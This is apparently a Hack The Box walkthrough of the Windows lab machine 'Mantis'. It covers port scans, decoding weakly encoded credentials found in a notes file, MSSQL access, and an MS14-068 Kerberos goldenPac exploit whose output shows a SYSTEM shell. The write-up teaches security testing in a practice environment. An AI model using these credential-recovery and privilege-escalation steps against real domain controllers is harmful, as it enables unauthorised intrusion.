If it were me I would have named this box Rabbit Hole. It is rated as a hard box, and it indeed was. There were a lot of services open, and checking each of them for a vulnerability was nothing less than tedious. At the same time the challenge taught me a ton of new things. At one point I had to re-run the port enumeration to find something I had missed. While running the exploit I ran into difficulties because of clock skew: my machine did not have the same time as the host. There are a lot of things to discuss!!
Initial Analysis
Mantis is a Windows box with IP 10.10.10.52. Running a port scan.
# Nmap 7.91 scan initiated Sun Mar 28 02:57:16 2021 as: nmap -Pn -sCV -p53,88,135,139,389,445,464,636,1433,3268,3269,8080,49153,49154,49155,49157,49158 -oN nmap/Basic_10.10.10.52.nmap 10.10.10.52
Nmap scan report for mantis.htb (10.10.10.52)
Host is up (0.19s latency).

PORT      STATE SERVICE      VERSION
53/tcp    open  domain       Microsoft DNS 6.1.7601 (1DB15CD4) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15CD4)
88/tcp    open  kerberos-sec Microsoft Windows Kerberos (server time: 2021-03-28 07:04:14Z)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp   open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds Windows Server 2008 R2 Standard 7601 Service Pack 1 microsoft-ds (workgroup: HTB)
464/tcp   open  kpasswd5?
636/tcp   open  tcpwrapped
1433/tcp  open  ms-sql-s     Microsoft SQL Server 2014 12.00.2000.00; RTM
| ms-sql-ntlm-info: 
|   Target_Name: HTB
|   NetBIOS_Domain_Name: HTB
|   NetBIOS_Computer_Name: MANTIS
|   DNS_Domain_Name: htb.local
|   DNS_Computer_Name: mantis.htb.local
|_  Product_Version: 6.1.7601
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2021-03-28T06:59:45
|_Not valid after:  2051-03-28T06:59:45
|_ssl-date: 2021-03-28T07:05:25+00:00; +6m51s from scanner time.
3268/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
8080/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Tossed Salad - Blog
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49157/tcp open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc        Microsoft Windows RPC
Service Info: Host: MANTIS; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 54m51s, deviation: 1h47m22s, median: 6m50s
| ms-sql-info: 
|   10.10.10.52:1433: 
|     Version: 
|       name: Microsoft SQL Server 2014 RTM
|       number: 12.00.2000.00
|       Product: Microsoft SQL Server 2014
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
| smb-os-discovery: 
|   OS: Windows Server 2008 R2 Standard 7601 Service Pack 1 (Windows Server 2008 R2 Standard 6.1)
|   OS CPE: cpe:/o:microsoft:windows_server_2008::sp1
|   Computer name: mantis
|   NetBIOS computer name: MANTIS\x00
|   Domain name: htb.local
|   Forest name: htb.local
|   FQDN: mantis.htb.local
|_  System time: 2021-03-28T03:05:16-04:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2021-03-28T07:05:12
|_  start_date: 2021-03-28T06:59:22

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Mar 28 02:58:40 2021 -- 1 IP address (1 host up) scanned in 83.60 seconds
This is one of the first things I got wrong, and I only found out later. I will come back to it down the line.
There are a lot of services open. As always, I added the host to my hosts file; the OS discovery found the domain names, so I added those as well.
There is nothing good here. I also fuzzed for directories and files; nothing came up.
No good. It's clear that pursuing this any further is a waste of time. Moving on.
LDAP (Lightweight Directory Access Protocol) is a software protocol for enabling anyone to locate organizations, individuals, and other resources such as files and devices in a network, whether on the public Internet or on a corporate intranet. LDAP is a “lightweight” (smaller amount of code) version of Directory Access Protocol (DAP).
I found a pentesting guide on LDAP and tried it out.
└─$ ipython3
Python 3.9.1+ (default, Feb 5 2021, 13:46:56) 
Type 'copyright', 'credits' or 'license' for more information
IPython 7.19.0 -- An enhanced Interactive Python. Type '?' for help.

In [1]: import ldap3

In [2]: server = ldap3.Server('10.10.10.52', get_info = ldap3.ALL, port =636, use_ssl = True)

In [3]: connection = ldap3.Connection(server)

In [4]: connection.bind()
---------------------------------------------------------------------------
LDAPSocketOpenError                       Traceback (most recent call last)
        if self.closed:  # try to open connection if closed
--> 561     self.open(read_server_info=False)
    562 if self.authentication == ANONYMOUS:
    563     if log_enabled(PROTOCOL):
I tried the other LDAP ports (389, 3268 and 3269) as well. No luck; I was unable to get a True response from bind().
Microsoft Remote Procedure Call, also known as a function call or a subroutine call, is a protocol that uses the client-server model in order to allow one program to request service from a program on another computer without having to understand the details of that computer’s network.
┌──(kali㉿kali)-[~/HackTheBox/mantis/nmap]
└─$ smbmap -H 10.10.10.52                                                      1 ⨯
/usr/lib/python3/dist-packages/impacket/smbserver.py:2464: SyntaxWarning: "is not" with a literal. Did you mean "!="?
  if jtr_dump_path is not '':
/usr/lib/python3/dist-packages/impacket/smbserver.py:2500: SyntaxWarning: "is not" with a literal. Did you mean "!="?
  if jtr_dump_path is not '':
/usr/lib/python3/dist-packages/impacket/smbserver.py:2842: SyntaxWarning: "is not" with a literal. Did you mean "!="?
  if jtr_dump_path is not '':
/usr/lib/python3/dist-packages/impacket/smbserver.py:4416: SyntaxWarning: "is not" with a literal. Did you mean "!="?
  if credentials_fname is not "":
[+] IP: 10.10.10.52:445	Name: mantis.htb.local

┌──(kali㉿kali)-[~/HackTheBox/mantis/nmap]
└─$ sudo nbtscan -r 10.10.10.52/24
[sudo] password for kali: 
Doing NBT name scan for addresses from 10.10.10.52/24

IP address       NetBIOS Name     Server    User             MAC address
------------------------------------------------------------------------------

┌──(kali㉿kali)-[~/HackTheBox/mantis/nmap]
└─$ smbclient -no-pass -L //10.10.10.52
Enter WORKGROUP\kali's password: 
Anonymous login successful

	Sharename       Type      Comment
	---------       ----      -------
SMB1 disabled -- no workgroup available

┌──(kali㉿kali)-[~/HackTheBox/mantis/nmap]
└─$ smbclient -U '%' -N \\\\10.10.10.52\\NETLOGON
tree connect failed: NT_STATUS_ACCESS_DENIED
Running out of things to check. MSSQL? That was a funny story: I tried brute forcing the MSSQL server using medusa.
That didn't work.
Kerberos. This was my first time pentesting Kerberos. I found this article, but it was of no use since I didn't have a username and password. -_-
At this point it's pretty clear that I missed something. The best way forward is another round of enumeration.
┌──(kali㉿kali)-[~/HackTheBox/mantis/nmap/nmap]
└─$ cat Full_10.10.10.52.nmap
# Nmap 7.91 scan initiated Mon Mar 29 01:26:29 2021 as: nmap -Pn -sCV -p53,88,135,139,389,445,464,593,636,1337,1433,3268,3269,5722,8080,9389,47001,49152,49153,49154,49155,49157,49158,49164,49166,49168,50255 -oN nmap/Full_10.10.10.52.nmap 10.10.10.52
Nmap scan report for mantis.htb (10.10.10.52)
Host is up (0.19s latency).

PORT      STATE SERVICE      VERSION
53/tcp    open  domain       Microsoft DNS 6.1.7601 (1DB15CD4) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15CD4)
88/tcp    open  kerberos-sec Microsoft Windows Kerberos (server time: 2021-03-29 05:33:29Z)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp   open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds Windows Server 2008 R2 Standard 7601 Service Pack 1 microsoft-ds (workgroup: HTB)
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
1337/tcp  open  http         Microsoft IIS httpd 7.5
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
1433/tcp  open  ms-sql-s     Microsoft SQL Server 2014 12.00.2000.00; RTM
| ms-sql-ntlm-info: 
|   Target_Name: HTB
|   NetBIOS_Domain_Name: HTB
|   NetBIOS_Computer_Name: MANTIS
|   DNS_Domain_Name: htb.local
|   DNS_Computer_Name: mantis.htb.local
|   DNS_Tree_Name: htb.local
|_  Product_Version: 6.1.7601
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2021-03-28T06:59:45
|_Not valid after:  2051-03-28T06:59:45
|_ssl-date: 2021-03-29T05:34:40+00:00; +6m52s from scanner time.
3268/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5722/tcp  open  msrpc        Microsoft Windows RPC
8080/tcp  open  http         Microsoft IIS httpd 7.5
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Tossed Salad - Blog
9389/tcp  open  mc-nmf       .NET Message Framing
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49157/tcp open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc        Microsoft Windows RPC
49164/tcp open  msrpc        Microsoft Windows RPC
49166/tcp open  msrpc        Microsoft Windows RPC
49168/tcp open  msrpc        Microsoft Windows RPC
50255/tcp open  ms-sql-s     Microsoft SQL Server 2014 12.00.2000
| ms-sql-ntlm-info: 
|   Target_Name: HTB
|   NetBIOS_Domain_Name: HTB
|   NetBIOS_Computer_Name: MANTIS
|   DNS_Domain_Name: htb.local
|   DNS_Computer_Name: mantis.htb.local
|   DNS_Tree_Name: htb.local
|_  Product_Version: 6.1.7601
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2021-03-28T06:59:45
|_Not valid after:  2051-03-28T06:59:45
|_ssl-date: 2021-03-29T05:34:40+00:00; +6m52s from scanner time.
Service Info: Host: MANTIS; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 41m09s, deviation: 1h30m44s, median: 6m51s
| ms-sql-info: 
|   10.10.10.52:1433: 
|     Version: 
|       name: Microsoft SQL Server 2014 RTM
|       number: 12.00.2000.00
|       Product: Microsoft SQL Server 2014
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
| smb-os-discovery: 
|   OS: Windows Server 2008 R2 Standard 7601 Service Pack 1 (Windows Server 2008 R2 Standard 6.1)
|   OS CPE: cpe:/o:microsoft:windows_server_2008::sp1
|   Computer name: mantis
|   NetBIOS computer name: MANTIS\x00
|   Domain name: htb.local
|   Forest name: htb.local
|   FQDN: mantis.htb.local
|_  System time: 2021-03-29T01:34:31-04:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2021-03-29T05:34:28
|_  start_date: 2021-03-28T06:59:22

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Mar 29 01:27:54 2021 -- 1 IP address (1 host up) scanned in 84.96 seconds
Something new turned up: port 1337 is running another HTTP service, and for the first time I understood the meaning of "enumerate harder"!!
The secure notes page contained 2 files; the contents of the dev_notes_NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx.txt.txt file were:
1. Download OrchardCMS
2. Download SQL server 2014 Express ,create user "admin",and create orcharddb database
3. Launch IIS and add new website and point to Orchard CMS folder location.
4. Launch browser and navigate to http://localhost:8080
5. Set admin password and configure sQL server connection string.
6. Add blog pages with admin user.

Credentials stored in secure format
OrchardCMS admin creadentials 010000000110010001101101001000010110111001011111010100000100000001110011011100110101011100110000011100100110010000100001
SQL Server sa credentials file namez
Finally something useful. It looks like I can get the creds for the CMS from here.
In [11]: import binascii

In [12]: x = int('0b010000000110010001101101001000010110111001011111010100000100000001110011011100110101011100110000011100100110010000100001',2)

In [13]: binascii.unhexlify('%x' % x)
Out[13]: b'@dm!n_P@ssW0rd!'
I poked around the admin dashboard and looked for any RCE. Couldn't find anything. Another rabbit hole, most probably!
The notes say the SQL Server password is also in the file, so I tried logging into the SQL server with the above password. It didn't work.
Checking the secure notes file again gave me the clue: the file name has a base64-encoded token in it.
The decoded value is hex; converting that to ASCII gives the SQL Server password.
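As an added example (not part of the original write-up), the following Python decodes both "secure format" layers from the notes in one pass: the binary string holding the OrchardCMS admin password and the base64-then-hex token in the file name. The function names are my own; the inputs are copied from the notes file and its name as shown above. Weak encodings like these are obfuscation, not protection, so anything found this way should be treated as a plaintext credential exposure.

```python
import base64
import binascii
import re

# Constructed inputs: the binary blob from the notes file body and the
# file name that carries the second token (both as they appear on the page).
BINARY_BLOB = (
    "0100000001100100011011010010000101101110010111110101000001000000"
    "01110011011100110101011100110000011100100110010000100001"
)
FILENAME = "dev_notes_NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx.txt.txt"


def filename_token(name: str) -> str:
    """Pull the encoded token out of 'dev_notes_<token>.txt.txt'."""
    return name.split("_")[-1].split(".")[0]


def bits_to_text(bits: str) -> str:
    """ASCII from a run of 0/1 characters, 8 bits per character."""
    if len(bits) % 8:
        raise ValueError("bit string length is not a multiple of 8")
    # int.to_bytes keeps leading zero bytes; the '%x' trick would drop them.
    return int(bits, 2).to_bytes(len(bits) // 8, "big").decode("ascii")


def hex_to_text(hexstr: str) -> str:
    """ASCII from a hex string; re-pads an odd length (dropped leading 0)."""
    if len(hexstr) % 2:
        hexstr = "0" + hexstr
    return binascii.unhexlify(hexstr).decode("ascii")


def decode_layers(token: str) -> tuple:
    """Peel binary, hex and base64 layers until plain text remains.

    Returns (text, [layers removed, outermost first]). Checks run in the
    order binary -> hex -> base64 because a binary string is also valid hex
    and a hex string is also valid base64; stops at the first non-ASCII step.
    """
    layers, current = [], token
    for _ in range(8):  # hard stop against pathological input
        try:
            if re.fullmatch(r"[01]+", current) and len(current) % 8 == 0:
                current, kind = bits_to_text(current), "binary"
            elif re.fullmatch(r"[0-9a-fA-F]+", current):
                current, kind = hex_to_text(current), "hex"
            elif re.fullmatch(r"[A-Za-z0-9+/]+={0,2}", current) and len(current) % 4 == 0:
                decoded = base64.b64decode(current, validate=True)
                current, kind = decoded.decode("ascii"), "base64"
            else:
                break
        except (UnicodeDecodeError, binascii.Error, ValueError):
            break
        layers.append(kind)
    return current, layers
```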
┌──(kali㉿kali)-[~/HackTheBox/mantis]
└─$ mssqlclient.py 'sa:m$$ql_S@_P@ssW0rd!@10.10.10.52'                        2 ⨯
/usr/share/offsec-awae-wheels/pyOpenSSL-19.1.0-py2.py3-none-any.whl/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Encryption required, switching to TLS
[-] ERROR(MANTIS\SQLEXPRESS): Line 1: Login failed for user 'sa'.

┌──(kali㉿kali)-[~/HackTheBox/mantis]
└─$ mssqlclient.py 'root:m$$ql_S@_P@ssW0rd!@10.10.10.52'
/usr/share/offsec-awae-wheels/pyOpenSSL-19.1.0-py2.py3-none-any.whl/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Encryption required, switching to TLS
[-] ERROR(MANTIS\SQLEXPRESS): Line 1: Login failed for user 'root'.

┌──(kali㉿kali)-[~/HackTheBox/mantis]
└─$ mssqlclient.py 'admin:m$$ql_S@_P@ssW0rd!@10.10.10.52'                     1 ⨯
/usr/share/offsec-awae-wheels/pyOpenSSL-19.1.0-py2.py3-none-any.whl/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: None, New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(MANTIS\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(MANTIS\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (120 7208) 
[!] Press help for extra shell commands
SQL> EXEC xp_cmdshell 'whoami.exe';
[-] ERROR(MANTIS\SQLEXPRESS): Line 1: The EXECUTE permission was denied on the object 'xp_cmdshell', database 'mssqlsystemresource', schema 'sys'.
SQL> EXEC xp_cmdshell 'whoami';
[-] ERROR(MANTIS\SQLEXPRESS): Line 1: The EXECUTE permission was denied on the object 'xp_cmdshell', database 'mssqlsystemresource', schema 'sys'.
SQL> 
Guess I won't be able to execute any commands here. Maybe I can get some information from the DB instead.
SQL> SELECT name FROM master.dbo.sysdatabases
name
My SQL skills are pretty bad, so I tried a GUI tool to look at the DB. I found a tool called DBeaver.
Found something useful in the orcharddb database, table blog_Orchard_Users_UserPartRecord.
Now that I have a username and password, Kerberos might work.
┌──(kali㉿kali)-[~/HackTheBox/mantis]
└─$ crackmapexec smb 10.10.10.52 -u james -p 'J@m3s_P@ssW0rd!'                1 ⨯
/usr/lib/python3/dist-packages/impacket/smbserver.py:2464: SyntaxWarning: "is not" with a literal. Did you mean "!="?
  if jtr_dump_path is not '':
/usr/lib/python3/dist-packages/impacket/smbserver.py:2500: SyntaxWarning: "is not" with a literal. Did you mean "!="?
  if jtr_dump_path is not '':
/usr/lib/python3/dist-packages/impacket/smbserver.py:2842: SyntaxWarning: "is not" with a literal. Did you mean "!="?
  if jtr_dump_path is not '':
/usr/lib/python3/dist-packages/impacket/smbserver.py:4416: SyntaxWarning: "is not" with a literal. Did you mean "!="?
  if credentials_fname is not "":
SMB         10.10.10.52     445    MANTIS           [*] Windows Server 2008 R2 Standard 7601 Service Pack 1 x64 (name:MANTIS) (domain:htb.local) (signing:True) (SMBv1:True)
SMB         10.10.10.52     445    MANTIS           [+] htb.local\james:J@m3s_P@ssW0rd! 

┌──(kali㉿kali)-[~/HackTheBox/mantis]
Okay, the login is valid but that alone didn't get me a shell. I'm pretty sure the james login can be used to get one; the only question is how.
Exploit
Kerberos: from this article I learned that authentication in Kerberos relies on tickets, and that there are cases where the system doesn't properly verify those tickets, which can lead to all sorts of bad things. One issue we might face here is that the system checks the timestamp.
There is a myth in the Windows Kerberos world that if a workstation's clock is skewed more than 5 minutes from that of the Domain Controller, Kerberos authentication won't work.
Is this possible?
The F-Secure Labs blog on MS14-068 suggested that the system can be exploited using the Impacket goldenPac module. Walkthroughs of this exploit in other forms require a lot more effort, including fetching the SID and then moving on to creating the ticket.
One thing to make sure of is the time. I used rdate to set my system's date from the host. The args -4ns mean: -4 use IPv4 addresses, -n use SNTP, and -s set the system time.
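The skew nmap reported on this box (+6m51s, then +6m52s) is exactly what caused my trouble here, so as an added example (not from the original post) here is a small Python check that parses the skew figures out of nmap output and compares them with the 5-minute default Kerberos clock tolerance, the same check a KDC applies before answering KRB_AP_ERR_SKEW. The sample lines are copied from the scan above and the function names are mine.

```python
import re
from datetime import timedelta

# Default KDC "Maximum tolerance for computer clock synchronization": 5 minutes.
KRB_MAX_SKEW = timedelta(minutes=5)

# Constructed sample: the skew-bearing lines from the nmap scan above, plus
# one unrelated line to show it is ignored.
NMAP_LINES = [
    "88/tcp    open  kerberos-sec Microsoft Windows Kerberos (server time: 2021-03-28 07:04:14Z)",
    "|_ssl-date: 2021-03-28T07:05:25+00:00; +6m51s from scanner time.",
    "|_clock-skew: mean: 54m51s, deviation: 1h47m22s, median: 6m50s",
]

# nmap prints durations as an optional sign followed by h/m/s components.
_DURATION = re.compile(r"(?P<sign>[-+]?)(?:(?P<h>\d+)h)?(?:(?P<m>\d+)m)?(?:(?P<s>\d+)s)?")


def parse_duration(text: str) -> timedelta:
    """'+6m51s', '1h47m22s', '-12s' -> timedelta with the sign preserved."""
    m = _DURATION.fullmatch(text.strip())
    if not m or not (m["h"] or m["m"] or m["s"]):
        raise ValueError(f"not an nmap duration: {text!r}")
    td = timedelta(hours=int(m["h"] or 0), minutes=int(m["m"] or 0), seconds=int(m["s"] or 0))
    return -td if m["sign"] == "-" else td


def extract_skews(lines) -> dict:
    """Collect the skew values nmap reports: ssl-date offset and clock-skew median."""
    found = {}
    for line in lines:
        if (m := re.search(r"ssl-date: .*?; ([-+]?\d+[hms0-9]*) from scanner time", line)):
            found["ssl-date"] = parse_duration(m.group(1))
        elif (m := re.search(r"clock-skew: .*median: ([-+]?\d+[hms0-9]*)", line)):
            found["clock-skew-median"] = parse_duration(m.group(1))
    return found


def kerberos_ok(skew: timedelta, tolerance: timedelta = KRB_MAX_SKEW) -> bool:
    """True if |skew| is within the KDC tolerance; otherwise expect KRB_AP_ERR_SKEW."""
    return abs(skew) <= tolerance


if __name__ == "__main__":
    for source, skew in extract_skews(NMAP_LINES).items():
        verdict = "ok" if kerberos_ok(skew) else "exceeds 5m tolerance, sync the clock first"
        print(f"{source}: {int(skew.total_seconds())}s -> {verdict}")
```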
[*] User SID: S-1-5-21-4220043660-4019079961-2895681657-1103
[*] Forest SID: S-1-5-21-4220043660-4019079961-2895681657
[*] Attacking domain controller mantis.htb.local
[*] mantis.htb.local found vulnerable!
[*] Requesting shares on mantis.htb.local.....
[*] Found writable share ADMIN$
[*] Uploading file FLOoVAWU.exe
[*] Opening SVCManager on mantis.htb.local.....
[*] Creating service ckTW on mantis.htb.local.....
[*] Starting service ckTW.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>whoami
nt authority\system
Logged in as NT AUTHORITY\SYSTEM (the Windows equivalent of root), and that is how I owned Mantis.